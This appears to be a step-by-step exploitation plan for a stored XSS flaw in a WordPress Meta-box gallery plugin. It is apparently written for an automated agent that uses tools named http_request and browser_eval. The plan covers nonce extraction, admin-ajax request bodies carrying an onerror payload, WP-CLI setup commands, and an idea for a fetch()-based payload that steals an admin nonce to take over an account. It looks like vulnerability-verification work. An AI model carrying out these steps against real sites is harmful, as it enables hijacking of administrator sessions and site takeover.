Exploitation Research Plan: CVE-2026-1302 (Meta-box GalleryMeta Stored XSS)

1. Vulnerability Summary

The Meta-box GalleryMeta plugin (version <= 3.0.1) is vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient sanitization and escaping of image captions within its gallery management interface. While WordPress core generally handles attachment captions safely, this plugin retrieves and renders these captions in its custom meta-box UI or frontend display without using escaping functions like esc_html() or esc_attr(). This allows an authenticated user with Editor permissions (or any user capable of uploading/editing media) to inject malicious scripts, which execute when an administrator or other user views the affected post or the gallery settings.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php (Standard WordPress media update) or the specific Post Edit screen wp-admin/post.php.
• Vulnerable Parameter: post_excerpt (This is the database field where WordPress stores the "Caption" for attachments).
• Authentication: Requires Editor level permissions (or Author, depending on specific site configuration).
• Precondition: The vulnerability is most relevant in Multi-site environments or single sites where the unfiltered_html capability has been revoked from Editors (e.g., via security hardening plugins).

3. Code Flow (Inferred)

1. Source: An Editor updates an attachment's caption via the WordPress Media Library or the Media Modal inside a post. This sends a request to wp_ajax_save_attachment.
2. Storage: The malicious payload is stored in the wp_posts table under the post_excerpt column for the attachment ID.
3. Plugin Processing: The Meta-box GalleryMeta plugin registers a meta box for posts. When rendering the gallery preview in the admin dashboard:
   • The plugin retrieves the IDs of images stored in the gallery meta field.
   • It loops through the IDs and calls get_post() or wp_prepare_attachment_for_js() for each image.
   • Sink: The plugin outputs the caption (excerpt) directly into the HTML of the meta box.
   • Hypothetical Vulnerable Function: RWMB_Gallery_Field::html() or a specialized template in meta-box-gallerymeta that renders the image list.
   • Vulnerable Line: echo "<span class='caption'>{$image->post_excerpt}</span>"; (Lack of esc_html).

4. Nonce Acquisition Strategy

To modify an image caption, we need a nonce for the WordPress media system.

1. Identify Trigger: The Meta-box GalleryMeta plugin enqueues its scripts on the post edit screen for post types where the gallery field is active.
2. Page Creation: Create a dummy post to trigger the meta box.

   wp post create --post_type=post --post_title="XSS Trigger" --post_status=publish
   

3. Navigate and Extract:
   • Navigate to the edit page of the created post: /wp-admin/post.php?post=[ID]&action=edit.
   • Meta Box usually localizes data into window.rwmb or standard WordPress localizes the media nonces into window._wpVariables or window.wp.media.
   • Script for Browser Eval:

     // Standard WP Media Nonce for saving attachment metadata
     window.wp.media.view.settings.post.nonce
     

5. Exploitation Strategy

Step 1: Upload a Malicious Image

We first need an attachment ID.

1. Use http_request to send a POST to /wp-admin/async-upload.php.
2. Provide a valid image file.
3. Extract the attachment id from the JSON response.

Step 2: Inject XSS into Caption

Update the caption of the attachment.

• Request Tool: http_request
• URL: https://[target]/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Body:

  action=save-attachment&
  id=[ATTACHMENT_ID]&
  nonce=[MEDIA_NONCE]&
  changes[excerpt]=<img src=x onerror=alert(document.domain)>&
  changes[title]=XSS_Image
  

Step 3: Add Image to GalleryMeta Field

Update a post to include this attachment ID in the plugin's gallery field.

• Request Tool: http_request
• URL: https://[target]/wp-admin/post.php
• Method: POST
• Body: Standard post update parameters, including the meta box field name (e.g., meta_box_gallery_field_id=[ATTACHMENT_ID]).

Step 4: Trigger XSS

Log in as an Administrator and navigate to the post edit screen of the post created in Step 3. The payload will execute in the admin's browser context when the GalleryMeta preview renders the caption.

6. Test Data Setup

1. Plugin Dependency: Ensure meta-box (core) is installed and active alongside meta-box-gallerymeta.
2. User: Create an Editor user.

   wp user create editor_user editor@example.com --role=editor --user_pass=password123
   

3. Meta Box Setup: Configure a gallery field for posts if the plugin doesn't add one by default. (Assuming the plugin adds a default gallery field for testing).

7. Expected Results

• The admin-ajax.php request should return a success: true JSON response.
• Upon visiting the edit page of the post as an Administrator, the browser should trigger an alert box showing the document domain.
• Viewing the page source of the admin post-editor should reveal the raw <img src=x onerror=...> tag inside the gallery preview container.

8. Verification Steps

1. Database Check:

   wp db query "SELECT post_excerpt FROM wp_posts WHERE post_type='attachment' AND post_title='XSS_Image'"
   

   Confirm the post_excerpt contains the raw script tag.
2. HTML Inspection:
   Use browser_navigate to the post edit page and check for the presence of the payload in the DOM:

   browser_eval("document.body.innerHTML.includes('onerror=alert')")
   

9. Alternative Approaches

• Frontend XSS: If the plugin provides a shortcode (e.g., [gallery_meta]), place this shortcode on a public page. The XSS may fire for unauthenticated visitors if the frontend rendering also lacks escaping.
• Shortcode injection:

  wp post create --post_content='[gallery_meta ids="[ATTACHMENT_ID]"]' --post_status=publish
  

• Alternative Payloads: If alert() is blocked by a WAF, use a fetch() payload to exfiltrate the administrator's _wpnonce for the user-new.php page to demonstrate account takeover capability.